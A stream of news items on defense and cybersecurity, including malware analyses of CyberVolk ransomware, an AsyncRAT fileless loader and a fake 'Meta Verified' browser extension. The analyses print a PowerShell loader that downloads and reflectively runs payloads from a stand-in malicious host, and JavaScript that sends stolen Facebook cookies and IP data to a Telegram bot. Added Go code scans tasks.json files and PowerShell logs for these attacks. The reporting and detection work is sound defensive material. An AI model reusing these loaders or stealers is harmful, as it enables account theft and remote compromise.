• Cyber defenders need AI tools to fend off a new generation of AI-powered attacks, the head of the National Geospatial-Intelligence Agency said Wednesday.

    “The concept of using AI to combat AI attack or something like that is very real to us. So this, again, is commanders’ business. You need to enable your [chief information security officer] with the tools that he or she needs in order to employ AI to properly handle AI-generated threats,” Vice Adm. Frank Whitworth said at the Billington Cybersecurity Summit Wednesday.

    Artificial intelligence has reshaped cyber, making it easier for hackers to manipulate data and craft more convincing fraud campaigns, like phishing emails used in ransomware attacks. 

    Whitworth spoke a day after Sean Cairncross, the White House’s new national cyber director, called for a “whole-of-nation” approach to ward off foreign-based cyberattacks. 

    “Engagement and increased involvement with the private sector is necessary for our success," Cairncross said Tuesday at the event. “I’m committed to marshalling a unified, whole-of-nation approach on this, working in lockstep with our allies who share our commitment to democratic values, privacy and liberty…Together, we’ll explore concepts of operation to enable our extremely capable private sector, from exposing malign actions to shifting adversaries’ risk calculus and bolstering resilience."

    The Pentagon has been incorporating AI into everything from administrative tasks to combat. The NGA has long used it to spot and predict threats; use of its signature Maven platform has doubled since January and quadrupled since March 2024. 

    But the agency is also using “good old-fashioned automation” to more quickly make the military’s maps. 

    “This year, we were able to produce 7,500 maps of the area involving Latin America and a little bit of Central America…that would have been 7.5 years of work, and we did it in 7.5 weeks,” Whitworth said. “Sometimes just good old-fashioned automation, better practices of using automation, it helps you achieve some of the speed, the velocity that we're looking for.”

    The military’s top officer also stressed the importance of using advanced tech to monitor and preempt modern threats.

    “There's always risk of unintended escalation, and that's what's so important about using advanced tech tools to understand the environment that we're operating in and to help leaders see and sense the risk that we're facing. And there's really no shortage of those risks right now,” said Gen. Dan Caine, chairman of the Joint Chiefs of Staff, who has an extensive background in irregular warfare and special operations, which can lean heavily on cutting-edge technologies. 

    “The fight is now centered in many ways around our ability to harvest all of the available information, put it into an appropriate data set, stack stuff on top of it—APIs and others—and end up with a single pane of glass that allows commanders at every echelon…to see that, those data bits at the time and place that we need to to be able to make smart tactical, operational and strategic decisions that will allow us to win and dominate on the battlefields of the future. And so AI is a big part of that,” Caine said. 

    The Pentagon recently awarded $200 million in AI contracts while the Army doubled down on its partnership with Palantir with a decade-long contract potentially worth $10 billion. The Pentagon has also curbed development of its primary AI platform, Advana, and slashed staff in its chief data and AI office with plans of a reorganization that promises to “accelerate Department-wide AI transformation” and make the Defense Department “an AI-first enterprise.”

  • A remote code execution vulnerability has been discovered in the Cursor AI Code Editor that lets a malicious code repository run code on a user’s machine automatically, the moment the repository is opened.

    The research team at Oasis Security uncovered the flaw, which bypasses typical user consent prompts by exploiting a default configuration setting in the popular editor.

    According to Oasis Security, the core of the vulnerability lies in Cursor shipping with its “Workspace Trust” feature disabled by default. This security setting, present in VS Code, is designed to prevent untrusted code from executing automatically.

    With this feature off, an attacker can craft a malicious code repository containing a specially configured .vscode/tasks.json file. By setting the runOptions.runOn parameter to “folderOpen”, any commands within this task file will execute the moment a developer opens the project folder in Cursor.

    Cursor AI Code Editor RCE Vulnerability

    This transforms a seemingly harmless action into silent code execution within the user’s security context, without any warning or prompt for trust. An attacker can leverage this to steal sensitive information, modify local files, or establish a connection to a command-and-control server.

    This vulnerability poses a significant risk because developer machines are often treasure troves of high-privilege credentials. Compromising a developer’s laptop can give an attacker immediate access to cloud API keys, Personal Access Tokens (PATs), and active SaaS sessions.

    The danger extends beyond the individual machine; with an initial foothold, an attacker can pivot to connected CI/CD pipelines and cloud infrastructure.

    This lateral movement is especially concerning as it can lead to the compromise of non-human identities, such as service accounts, which often possess broad and powerful permissions across an organization’s environment. A single booby-trapped repository could initiate a widespread security incident.

    Cursor users running the default configuration are directly affected by this vulnerability. In contrast, standard Visual Studio Code users with Workspace Trust enabled are at a lower risk, as the feature blocks automatic task execution until the user explicitly grants trust to the project folder.

    In response to the disclosure, Cursor has stated that users can manually enable Workspace Trust and that updated security guidance will be published soon.

    Oasis Security has provided immediate hardening recommendations for development teams. Users should enable Workspace Trust in Cursor, require the startup prompt, and consider setting the task.allowAutomaticTasks preference to “off”.

    It is also advised to open all unknown repositories in a secure, isolated environment, such as a disposable container or virtual machine, to prevent potential execution.
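    As an added example (not code from Oasis Security or Cursor), the following Go pre-open check parses a checkout's .vscode/tasks.json files and reports any task whose runOptions.runOn is "folderOpen", so an untrusted repository can be inspected before it is opened in an editor that has Workspace Trust off. The sample tasks.json is constructed; the function and type names are this example's own.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// AutoTask is a task the editor would start on its own when the folder opens.
type AutoTask struct {
	Label   string
	Command string // command and args joined for display
	Source  string // tasks.json path; empty when parsing a string directly
}

type rawTask struct {
	Label      string            `json:"label"`
	Command    json.RawMessage   `json:"command"`
	Args       []json.RawMessage `json:"args"`
	RunOptions struct {
		RunOn string `json:"runOn"`
	} `json:"runOptions"`
}

// tasks.json is JSONC: encoding/json rejects comments and trailing commas, so both are
// stripped first. A comment must start a line or follow whitespace, which leaves
// "https://..." inside string values intact; treat any remaining parse error as a finding.
var lineComment = regexp.MustCompile(`(?m)(^|\s)//[^\n]*`)
var trailingComma = regexp.MustCompile(`,(\s*[}\]])`)

// rawString renders a string value, or the raw JSON for object forms (quoted args,
// per-platform commands) so nothing is silently dropped from the report.
func rawString(m json.RawMessage) string {
	var s string
	if json.Unmarshal(m, &s) == nil {
		return s
	}
	return strings.TrimSpace(string(m))
}

// FindAutoRunTasks returns every task whose runOptions.runOn is "folderOpen",
// the setting the report describes, from one tasks.json body.
func FindAutoRunTasks(jsonc string) ([]AutoTask, error) {
	src := trailingComma.ReplaceAllString(lineComment.ReplaceAllString(jsonc, "$1"), "$1")
	var doc struct {
		Tasks []rawTask `json:"tasks"`
	}
	if err := json.Unmarshal([]byte(src), &doc); err != nil {
		return nil, fmt.Errorf("tasks.json parse: %w", err)
	}
	var found []AutoTask
	for _, t := range doc.Tasks {
		if !strings.EqualFold(t.RunOptions.RunOn, "folderOpen") {
			continue
		}
		parts := []string{rawString(t.Command)}
		for _, a := range t.Args {
			parts = append(parts, rawString(a))
		}
		found = append(found, AutoTask{Label: t.Label, Command: strings.TrimSpace(strings.Join(parts, " "))})
	}
	return found, nil
}

// ScanRepo walks a checkout and collects folderOpen tasks from every
// .vscode/tasks.json it contains, nested folders included.
func ScanRepo(root string) ([]AutoTask, error) {
	var all []AutoTask
	err := filepath.WalkDir(root, func(path string, d os.DirEntry, err error) error {
		if err != nil || d.IsDir() || d.Name() != "tasks.json" || filepath.Base(filepath.Dir(path)) != ".vscode" {
			return err
		}
		body, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		tasks, err := FindAutoRunTasks(string(body))
		if err != nil {
			return fmt.Errorf("%s: %w", path, err)
		}
		for i := range tasks {
			tasks[i].Source = path
		}
		all = append(all, tasks...)
		return nil
	})
	return all, err
}

// Constructed sample: a normal build task and one that auto-runs on folder open.
const sampleTasksJSON = `{
  "version": "2.0.0", // constructed for the example
  "tasks": [
    { "label": "build", "type": "shell", "command": "make", },
    { "label": "prepare", "type": "shell", "command": "echo",
      "args": ["hello from folderOpen"], "runOptions": { "runOn": "folderOpen" } }
  ]
}`
```

Pointing ScanRepo at a fresh clone before opening it gives a reviewer the exact commands that would run; a non-empty result is a reason to open the folder only in a disposable container or VM, as the recommendations above suggest.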

    The post Cursor AI Code Editor RCE Vulnerability Enables “autorun” of Malicious on your Machine appeared first on Cyber Security News.

  • The word Defense in the name of the government agency now dubbed the Department of War invited “bureaucratic mission creep”—or so argues a Washington Post editorial that points to the nineteen mentions of “climate” in the 2022 National Defense Strategy. The op-ed suggests that previous administrations made fighting climate change “the military’s job” at the expense of its traditional focus on deterring conflict and, when necessary, winning wars. Nothing could be further from the truth.

    Both of us worked on strategy and climate security matters in the Office of the Secretary of Defense, so we are well-positioned to articulate how and why the Department’s focus on climate change has grown over the years, across administrations of both parties. The simple fact is that climate change poses enormous challenges for the American military. If the Department does not continue adapting to climate-related threats, it will face extraordinary new costs, which it will pay in billions of dollars, in warfighting readiness, and, ultimately, in the lives of American service members.

    To illustrate, in 2018 and 2019, the Department sustained more than $10 billion in damages at Tyndall Air Force Base, Camp Lejeune, and Offutt Air Force Base as the result of climate-driven storms. In the 2018 National Defense Authorization Act, Congress required the Department to scrutinize the military’s vulnerabilities to wildfires, floods, hurricanes, and sea-level rise; the consequent report gave rise to new predictive tools to foresee and mitigate the effects of climate hazards on defense installations. 

    The 2022 NDS reflected this hard experience, as well as hard science: “Increasing temperatures, changing precipitation patterns, rising sea levels, and more frequent extreme weather conditions will affect basing and access while degrading readiness, installations, and capabilities.” To address these concerns, the NDS directed the Department to strengthen its “ability to withstand and recover quickly from climate events.” The climate and weather monitoring tools that the Department relies on are now being dismantled to score political points. That means more risk—for installations, for military platform performance, and for individual service members, many of whose readiness and wellbeing are already being compromised by the increase in “black flag days,” when temperatures are too hot to train. 

    Climate change also figures heavily in the NDS because the military is increasingly called upon to deal with it—by state and local authorities who need help responding to climate-driven disasters. The number of personnel days the National Guard dedicated to fighting wildfires increased from 14,000 in 2016 to 176,000 in 2021, and have since continued to rise. As we wrote in the NDS, climate change “will increase demands, including on the Joint Force, for disaster response and defense support of civil authorities.” These new requirements mean that our soldiers are not training for core national-security tasks like preparing for war or, as this administration has decided, picking up trash in our nation’s capital. And such requirements are likely to accelerate with the pending demise of the Federal Emergency Management Agency.

    Indeed, climate change is reshaping the very map of the world—“creating new corridors of strategic interaction, particularly in the Arctic region,” as the NDS put it. Melting sea ice is creating new possibilities for navigation and resource exploitation, which is leading to more Russian and Chinese military operations along the Alaskan coastline. To accomplish its homeland-defense mission, the Department must closely monitor both the changing geophysical context as well as the shifting geopolitical environment. 

    There are many additional reasons the Department should be thinking intently about the implications of climate change, but the last one we’ll mention is the likelihood that global warming will spur a massive increase in migration, which is ostensibly a primary concern of the Trump administration. Scholars have identified drought as a key causal factor in the Syrian civil war, which led millions to seek refuge in Europe. As the NDS stated, and experience has since validated, “Insecurity and instability related to climate change may tax governance capacity in some countries while heightening tensions between others, risking new armed conflicts and increasing demands for stabilization activities.”

    We agree with the Trump administration that fighting climate change should not be the primary focus of our national-security establishment. No credible defense strategist has ever argued that should be the case. However, all Americans should want our military to integrate consideration of climate change into its planning and operations so it can achieve its mandate of defending against threats to the American people. Failure to plan for operating conditions that are changing fundamentally would be a colossal strategic mistake. 

    The Department of Defense was increasingly prepared for all threats. The Department of War might prepare for a far narrower set. If so, we will all come to regret it.

    Dr. Josh Busby is a Professor at the University of Texas who served as a senior climate advisor within the Office of the Secretary of Defense from 2021-2023. His core responsibility was integrating the effects of climate change on the military, and how DoD might build resilience to them, into the 2022 NDS. 

    Greg Pollock is an Adjunct Professor at Georgetown University who served in a series of leadership positions in the Office of the Secretary of Defense from 2010-2025, most recently as the acting deputy assistant secretary of defense for the Arctic and Global Resilience. 

  • Jaguar Land Rover (JLR) has confirmed that data was stolen during a major cyberattack that has crippled its global operations, bringing vehicle production to a standstill since early September.

    The luxury carmaker, a subsidiary of India’s Tata Motors, is now working with cybersecurity specialists to investigate the breach and restore its systems.

    The cyber incident, first disclosed on September 2, 2025, prompted JLR to shut down its IT systems as a precautionary measure, which severely disrupted its manufacturing and sales operations.

    The shutdown has halted production at its key UK facilities in Solihull, Halewood, and Wolverhampton, stopping the assembly of approximately 1,000 vehicles per day. The disruption extends globally, affecting factories in Slovakia and India, as well as dealer sales, vehicle handovers, and the ordering of parts.

    Initially, JLR stated there was no evidence that customer data had been compromised. However, in a statement released on September 10, the company revised its assessment, admitting that its ongoing investigation revealed “some data has been affected”.

    While JLR has not specified whether the compromised data belongs to customers, employees, or the company itself, it has notified the UK’s Information Commissioner’s Office (ICO) and other relevant regulators.

    A JLR spokesperson stated, “Since we became aware of the cyber incident, we have been working around the clock, alongside third-party cybersecurity specialists, to restart our global applications in a controlled and safe manner”.

    The company has assured that its “forensic investigation continues at pace” and that it will contact anyone whose data is found to be impacted.

    The attack has caused significant concern, with UK government officials reportedly worried about the economic fallout from the prolonged shutdown, which is expected to last for weeks.

    A hacking group known as “Scattered Lus$,” previously linked to attacks on other UK retailers, has reportedly claimed responsibility for the breach.

    JLR continues to manage the crisis, with the majority of its production workers being told not to return to work as the company assesses the situation daily. The carmaker has apologized for the ongoing disruption caused by the incident.

    The post Jaguar Land Rover Confirms Hackers Stole Data in Ongoing Cyberattack appeared first on Cyber Security News.

  • CyberVolk ransomware first emerged in May 2024, rapidly evolving into a sophisticated threat aimed at government agencies and critical infrastructure in countries perceived as hostile to Russian interests.

    Leveraging a dual-layer symmetric encryption process, this malware has inflicted significant operational disruptions on scientific institutions and public services across Japan, France, and the United Kingdom.

    The group behind the attacks communicates exclusively via Telegram, issuing demands of $20,000 in Bitcoin and warning that any attempt to recover encrypted files will result in data destruction.

    Initial infection typically occurs through targeted phishing campaigns or compromised administrative credentials, allowing the ransomware to execute under standard user privileges before relaunching with elevated rights.

    ASEC analysts identified that once administrative access is obtained, the malware systematically excludes system-critical directories and files by matching predefined path strings such as “Windows” and “Program Files”.

    CyberVolk execution flow (Source – ASEC)

    This exclusion ensures that essential system components remain intact, preventing unintended system crashes that could thwart ransom negotiations.

    ASEC researchers noted the malware’s unique double-encryption structure, combining AES-256 in GCM mode with ChaCha20-Poly1305 to secure each file.

    A 12-byte random nonce is generated for every encryption operation, but critically, this nonce is not preserved in the encrypted file’s metadata, rendering decryption virtually impossible without the original key.

    Once encryption concludes, CyberVolk creates a ransom note named READMENOW.txt in the affected directory, instructing victims on payment and decryption procedures.

    Generated ransom note (Source – ASEC)

    Despite its technical sophistication, CyberVolk ransomware exhibits a deliberate flaw in its decryption routine.

    When victims enter the supplied decryption key, the malware attempts to decrypt the ChaCha20-Poly1305 layer using an incorrect nonce, causing the process to fail even with a valid key.

    Camouflage decryption progress (Source – ASEC)

    This “camouflage decryption” tactic misleads victims into believing they can recover data through payment, while in reality, the absence of the original nonce makes recovery unfeasible.

    Infection Mechanism Deep Dive

    Upon execution, CyberVolk checks its privileges and, if necessary, triggers a privilege escalation routine to gain administrator rights.

    It then enumerates files across all local drives, filtering out paths containing substrings defined in an exclusion table.

    The core encryption routine reads each file into memory and invokes the Go-based crypto_aes_NewCipher function followed by crypto_cipher_NewGCM to perform AES-256 GCM encryption:

    // Reconstructed as Go source from the decompiled calls (crypto_aes_NewCipher, crypto_cipher_NewGCM)
    block, _ := aes.NewCipher(key)                     // 32-byte key selects AES-256
    aead, _ := cipher.NewGCM(block)                    // GCM: 12-byte nonce, 16-byte tag
    nonce := make([]byte, aead.NonceSize())
    rand.Read(nonce)                                   // fresh random nonce for every file
    ciphertext := aead.Seal(nil, nonce, fileData, nil) // the nonce is neither prepended nor saved

    This ciphertext is subsequently wrapped with ChaCha20-Poly1305, producing a compact payload consisting solely of encrypted data and an authentication tag.

    By omitting the nonce in the stored payload, the developers guarantee that only they can perform valid decryption—though their own flawed implementation prevents even them from restoring files without manual nonce management.
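    An added Go example (not CyberVolk's code or ASEC's analysis) using the standard library's AES-256-GCM to show why a file sealed as ciphertext||tag with the nonce discarded cannot be opened without that nonce, and how the conventional nonce||ciphertext||tag layout avoids the problem. The ChaCha20-Poly1305 outer layer is an AEAD with the same 12-byte nonce and fails the same way on a wrong nonce. The key and file contents are constructed, and the function names are this example's own.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, errors.New("AES-256 needs a 32-byte key")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block) // 12-byte nonce, 16-byte authentication tag
}

// SealDiscardingNonce reproduces the layout described in the report: a random
// nonce is used once and written nowhere. It is returned here only so the demo
// can show that the payload opens with it and fails without it.
func SealDiscardingNonce(key, plaintext []byte) (payload, nonce []byte, err error) {
	aead, err := newGCM(key)
	if err != nil {
		return nil, nil, err
	}
	nonce = make([]byte, aead.NonceSize())
	if _, err = rand.Read(nonce); err != nil {
		return nil, nil, err
	}
	return aead.Seal(nil, nonce, plaintext, nil), nonce, nil
}

// OpenWithNonce is what any decryptor of such a payload must do: obtain the
// nonce from somewhere else. With the wrong nonce the tag check fails and no
// plaintext is returned, which is the "camouflage decryption" outcome.
func OpenWithNonce(key, nonce, payload []byte) ([]byte, error) {
	aead, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	return aead.Open(nil, nonce, payload, nil)
}

// SealWithNonce is the conventional recoverable layout: nonce||ciphertext||tag.
func SealWithNonce(key, plaintext []byte) ([]byte, error) {
	payload, nonce, err := SealDiscardingNonce(key, plaintext)
	if err != nil {
		return nil, err
	}
	return append(nonce, payload...), nil
}

// OpenStored splits the stored nonce off and decrypts; only the key is needed.
func OpenStored(key, stored []byte) ([]byte, error) {
	aead, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	ns := aead.NonceSize()
	if len(stored) < ns+aead.Overhead() {
		return nil, errors.New("stored payload too short")
	}
	return aead.Open(nil, stored[:ns], stored[ns:], nil)
}

func main() {
	key := make([]byte, 32) // constructed demo key; a real key must be random
	file := []byte("constructed sample file contents")

	payload, nonce, _ := SealDiscardingNonce(key, file)
	fmt.Printf("ciphertext||tag: %d bytes for %d input bytes, nonce not stored\n", len(payload), len(file))
	if _, err := OpenWithNonce(key, make([]byte, 12), payload); err != nil {
		fmt.Println("wrong nonce:", err) // cipher: message authentication failed
	}
	if pt, err := OpenWithNonce(key, nonce, payload); err == nil {
		fmt.Printf("right nonce: %q\n", pt)
	}
	stored, _ := SealWithNonce(key, file)
	pt, err := OpenStored(key, stored)
	fmt.Printf("stored-nonce layout: %q (err=%v)\n", pt, err)
}
```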

    The tailored infection routine, combined with sophisticated encryption layers and deliberate recovery flaws, underscores CyberVolk’s intent to maximize operational impact and victim uncertainty.

    Organizations must implement off-site backups, restrict administrative access, and conduct regular recovery drills to mitigate such threats.

    The post CyberVolk Ransomware Attacking Windows System in Critical Infrastructure and Scientific Institutions appeared first on Cyber Security News.

  • Security researchers have recently observed a surge in sophisticated fileless malware campaigns targeting enterprise environments.

    AsyncRAT, a powerful Remote Access Trojan, leverages legitimate system tools to execute malicious payloads entirely in memory, effectively sidestepping traditional disk-based defenses.

    The emergence of this threat underscores the evolving tactics employed by cyber adversaries to maintain stealth and persistence on compromised systems.

    Initial access in the majority of these attacks is achieved through compromised remote support software. Intruders exploit unauthorized ScreenConnect deployments, gaining interactive control over victim machines.

    Once inside, they deploy a multi-stage loader written in VBScript. LevelBlue analysts noted that this loader retrieves two encoded payloads—logs.ldk and logs.ldr—from attacker-controlled servers.

    These payloads are never written to disk; instead, they are loaded reflectively straight into memory, with the raw byte arrays turned into executable code at runtime.

    AsyncRAT’s architecture revolves around modular .NET assemblies designed for both evasion and core RAT functionality.

    LevelBlue researchers identified three principal classes within the first-stage DLL: an entry-point initializer, a persistence manager that creates scheduled tasks disguised as legitimate updaters, and an anti-analysis component that patches AMSI and ETW hooks to disable Windows security logging.

    Through dynamic API resolution and in-memory loading, the malware maximizes stealth and complicates forensic analysis.

    Beyond obfuscation, AsyncRAT’s second stage—AsyncClient.exe—serves as the command-and-control engine.

    Encrypted configuration data within the binary specifies C2 domains, ports, infection flags, and target directories.

    Upon decryption with AES-256, the client establishes a TCP socket to its control server, exchanging length-prefixed MessagePack packets.

    This protocol supports reconnaissance commands, data exfiltration routines, and remote execution of attacker-supplied instructions.

    Infection Mechanism

    AsyncRAT’s infection mechanism begins with the execution of a simple VBScript, Update.vbs, launched through WScript.exe.

    The script employs the following PowerShell snippet to fetch and execute the loader:

    $urls = @("http://malicious.domain/logs.ldk","http://malicious.domain/logs.ldr")
    foreach ($u in $urls) {
        # fetch the encoded assembly as a byte array; nothing is saved to disk
        $bytes = (New-Object Net.WebClient).DownloadData($u)
        # load it reflectively into this process and run its entry point
        [Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())
    }

    This concise loader carries out two critical functions: it decrypts the downloaded binaries and invokes their entry points entirely in memory, leaving no forensic footprint on disk.
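    An added Go example (not LevelBlue's detection content) that triages PowerShell script-block records against the loader pattern quoted above, flagging a block only when in-memory assembly loading and a network download appear together, since either alone is routine in administration scripts. The log lines are constructed; the indicator names and the example.invalid host are assumptions of this example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding records one flagged script block and the indicators that matched.
type Finding struct {
	Line       int      // 1-based line of the sample; one script block per line
	Indicators []string // names of the matched patterns
}

type indicator struct {
	name string
	re   *regexp.Regexp
}

// Indicator names are this example's own. Each pattern is common in admin
// scripting by itself; the combination inside one block is the signal.
var indicators = []indicator{
	{"reflective-load", regexp.MustCompile(`(?i)\[(System\.)?Reflection\.Assembly\]::Load\s*\(`)},
	{"entrypoint-invoke", regexp.MustCompile(`(?i)\.EntryPoint\.Invoke\s*\(`)},
	{"web-download", regexp.MustCompile(`(?i)(Net\.WebClient|DownloadData|DownloadString|Invoke-WebRequest|Invoke-RestMethod)`)},
	{"ldk-ldr-payload", regexp.MustCompile(`(?i)logs\.ld[kr]\b`)}, // file names from the report
}

// MatchIndicators returns the names of every indicator present in one block.
func MatchIndicators(block string) []string {
	var hits []string
	for _, ind := range indicators {
		if ind.re.MatchString(block) {
			hits = append(hits, ind.name)
		}
	}
	return hits
}

// IsSuspicious requires reflective loading together with a download or an
// entry-point invocation, or the reported payload names, so a plain
// Invoke-WebRequest or an Assembly::Load of an installed assembly does not fire.
func IsSuspicious(hits []string) bool {
	has := func(name string) bool {
		for _, h := range hits {
			if h == name {
				return true
			}
		}
		return false
	}
	return has("ldk-ldr-payload") || (has("reflective-load") && (has("web-download") || has("entrypoint-invoke")))
}

// ScanScriptBlocks treats every non-empty line as one script block. Real
// Event ID 4104 records carry a multi-line ScriptBlockText field; join each
// record's text into one string before passing it to MatchIndicators.
func ScanScriptBlocks(text string) []Finding {
	var findings []Finding
	for i, line := range strings.Split(text, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		if hits := MatchIndicators(line); IsSuspicious(hits) {
			findings = append(findings, Finding{Line: i + 1, Indicators: hits})
		}
	}
	return findings
}

// Constructed sample: two routine admin blocks, a by-name assembly load, and
// the loader pattern from the report condensed to one line.
const sampleBlocks = `Get-ChildItem C:\Logs -Filter *.evtx | Sort-Object LastWriteTime
Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\Temp\report.csv
[Reflection.Assembly]::Load("System.Windows.Forms")
$bytes = (New-Object Net.WebClient).DownloadData($u); [Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, @())
`

func main() {
	for _, f := range ScanScriptBlocks(sampleBlocks) {
		fmt.Printf("line %d: suspicious (%s)\n", f.Line, strings.Join(f.Indicators, ", "))
	}
}
```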

    By chaining reflection-based loading with anti-analysis routines in the Obfuscator.dll, the attacker ensures that each stage remains hidden from endpoint detection tools.

    Subsequent control is handed off to AsyncClient.exe, which maintains persistence and enables full remote administration of the host.

    Through this fileless approach, AsyncRAT demonstrates how modern malware can blend legitimate scripting platforms with advanced evasion tactics to compromise and control targeted systems seamlessly.

    The post AsyncRAT Uses Fileless Loader to Bypass Detections and Gain Remote Access appeared first on Cyber Security News.

  • Malicious actors have launched a sophisticated malvertising campaign on Facebook that coerces unsuspecting users into installing a fake “Meta Verified” browser extension.

    Promoted through seemingly legitimate video tutorials, these ads promise to unlock the coveted blue verification tick without paying Meta’s subscription fee.

    In reality, the extension is engineered to harvest sensitive user data, including session cookies, access tokens, and IP addresses.

    By leveraging trusted platforms like Box.com for hosting, attackers ensure high availability and evade simple URL-blocking defenses, making the scam appear both authentic and risk-free.

    Upon closer inspection, the video tutorials accompanying the ads bear the fingerprints of Vietnamese-speaking threat actors, with narration and code comments written in Vietnamese.

    The extension’s code, although clumsily obfuscated and likely generated by an AI-assisted toolkit, still effectively exfiltrates data.

    Bitdefender analysts identified the use of the Facebook Graph API to query Business account information once valid access tokens are acquired, allowing attackers to distinguish high-value corporate profiles from personal accounts.

    Malicious browser extension ad (Source – Bitdefender)

    Victims who follow the tutorial unwittingly grant the extension permissions to read and export cookies from the facebook.com domain.

    Once installed, the extension immediately invokes an exportCookies function that compiles every cookie into a formatted string before transmitting it to a Telegram bot controlled by the attackers.

    Cookie export function (Source – Bitdefender)

    To further personalize the stolen data, the malware queries https://ipinfo.io/json to append geolocation details, bolstering its marketability on underground forums.

    Bitdefender researchers noted that variants of this extension include adjustable parameters for tick size and position, suggesting an automated pipeline for generating new campaign assets with minimal manual effort.

    The modular design also supports automatic execution upon Chrome startup, ensuring persistent data harvesting even if users disable and re-enable the extension.

    Infection Mechanism Deep Dive

    The core of the infection mechanism lies in the malicious extension’s background script, which hooks into Chrome’s cookies API to extract session tokens without triggering user prompts.

    After installation—triggered by clicking on an ad link—the extension uses chrome.cookies.getAll({ domain: "facebook.com" }, callback) to gather cookies.

    Within the callback, it constructs the payload:

    async function exportCookies() {
      chrome.cookies.getAll({ domain: "facebook.com" }, async cookies => {
        // every facebook.com cookie flattened into name=value pairs
        const cookieString = cookies.map(c => `${c.name}=${c.value}`).join(";");
        // the c_user cookie carries the logged-in account ID
        const userId = cookies.find(c => c.name === "c_user")?.value || "Unknown";
        const ipInfo = await fetch('https://ipinfo.io/json').then(r => r.json()).catch(() => ({}));
        const payload = `ID: ${userId}\nIP: ${ipInfo.ip || "Unknown"}\nCookies: ${cookieString}`;
        sendToTelegram(payload);
      });
    }

    This streamlined approach bypasses many endpoint-based detections, while the use of legitimate domains for hosting and command-and-control reduces the likelihood of rapid takedown.

    Security teams should monitor abnormal cookie export activity and enforce rigorous extension vetting to defend against such industrialized malvertising threats.

    The post Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details appeared first on Cyber Security News.

  • An advanced persistent threat (APT) group from China has been attributed to the compromise of a Philippines-based military company using a previously undocumented fileless malware framework called EggStreme. “This multi-stage toolset achieves persistent, low-profile espionage by injecting malicious code directly into memory and leveraging DLL sideloading to execute payloads,” Bitdefender

  • NATO officials met in an emergency session after Russian drones were shot down over Poland. The intrusion prompted a rare coordinated shootdown effort by the alliance featuring Polish F-16s, Dutch F-35s, an Italian AWACS aircraft, a NATO aerial tanker, and German Patriot air defense systems, NATO Secretary General Mark Rutte told reporters Wednesday. 

    Moscow’s military used “more than 10 Russian Shahed drones” in the incident, which European Union Commission President Ursula von der Leyen described as “a reckless and unprecedented violation of Poland and Europe's air[s]pace.” 

    Ukrainian President Volodymyr Zelenskyy weighed in as well. “In total, at least several dozen Russian drones were moving along the border of Ukraine and Belarus and across western regions of Ukraine, approaching targets on Ukrainian territory and, apparently, on Polish territory,” Zelenskyy wrote on social media. “Our air defense forces destroyed more than 380 Russian drones of various types. At least 250 of them were [Iranian-designed] ‘shaheds.’”

    “This is the first time NATO aircrafts have engaged potential threats in Allied airspace,” the alliance’s military spokesman said in a statement, and noted alliance members are “committed to defending every kilometre of NATO territory, including our airspace.”

    After the intrusions, Poland invoked NATO’s Article 4, which is an agreement to meet among allies when one feels threatened. “A full assessment of the incident is ongoing,” Rutte said, stressing, “What is clear is that the violation last night is not an isolated incident.”

    Rutte’s message to Russia: “Stop violating Allied airspace. And know that we stand ready, that we are vigilant, and that we will defend every inch of NATO territory.”

    POTUS reax: “What’s with Russia violating Poland’s airspace with drones? Here we go!” the U.S. president wrote on social media Wednesday morning, without elaborating. 

    The view from Berlin: This was not “a matter of course correction errors or anything of that sort. These drones were quite obviously deliberately directed on this course,” said German Defense Minister Boris Pistorius. 

    Canada’s prime minister called the incident “reckless and escalatory,” and vowed to “remain vigilant against Russia’s attempts to widen and prolong the conflict with Ukraine.” 

    Even Putin ally Viktor Orban declared Hungary “stands in full solidarity with Poland following the recent drone incident,” and said on social media, “The violation of Poland’s territorial integrity is unacceptable.”

    The U.S. ambassador to NATO threw his support behind the alliance in a short statement and vowed to “defend every inch of NATO territory.” 

    Capitol Hill reax: “The Administration’s policy towards Russia is weak and vacillating, and Putin is taking advantage of it,” said Armed Services Committee member Rep. Don Bacon, R-Illinois, writing Wednesday morning on social media. 

    “An act of war” is how fellow HASC member Rep. Joe Wilson, R-South Carolina, described the incident, writing on social media as well. He added, “I urge President Trump to respond with mandatory sanctions that will bankrupt the Russian war machine and arm Ukraine with weapons capable of striking Russia. Putin is no longer content just losing in Ukraine while bombing mothers and babies, he is now directly testing our resolve in NATO territory.”

    Two senators on the Foreign Relations Committee released a bipartisan statement criticizing President Trump for insufficient pressure on Moscow, writing, “It has been three weeks since President Trump met with Vladimir Putin. Since that time, Putin met with fellow autocrats in Beijing to conspire against America and returned to Moscow to escalate his illegal invasion of Ukraine,” said co-chairs of the Senate NATO Observer Group Jeanne Shaheen, D-New Hampshire, and Thom Tillis, R-North Carolina. “Russia has now launched the largest aerial assault since the invasion began—firing more than 800 drones and missiles, setting Ukraine’s Cabinet of Ministers ablaze and killing civilians, including a mother and her infant.” 

    “At the very moment Putin escalates, the United States appears to be cutting back,” the senators warn, flagging “Programs like Section 333 security cooperation, which includes the Baltic Security Initiative—lifelines for NATO’s eastern flank—[that] are now on the chopping block, even as Europe takes on more of the burden. The message this sends is dangerous: that the United States is pulling back just as the stakes in Ukraine and for NATO’s security are at their highest. Our adversaries are taking note that they can wait out American support—that does not make America safer.” 

    “Putin has shown us time and again that he is a liar and a murderer. He never wanted peace,” said Shaheen and Tillis, who also encouraged the passage of new “legislation that imposes crippling sanctions on Putin’s regime” because “the cost of inaction to America’s security is too high.” 

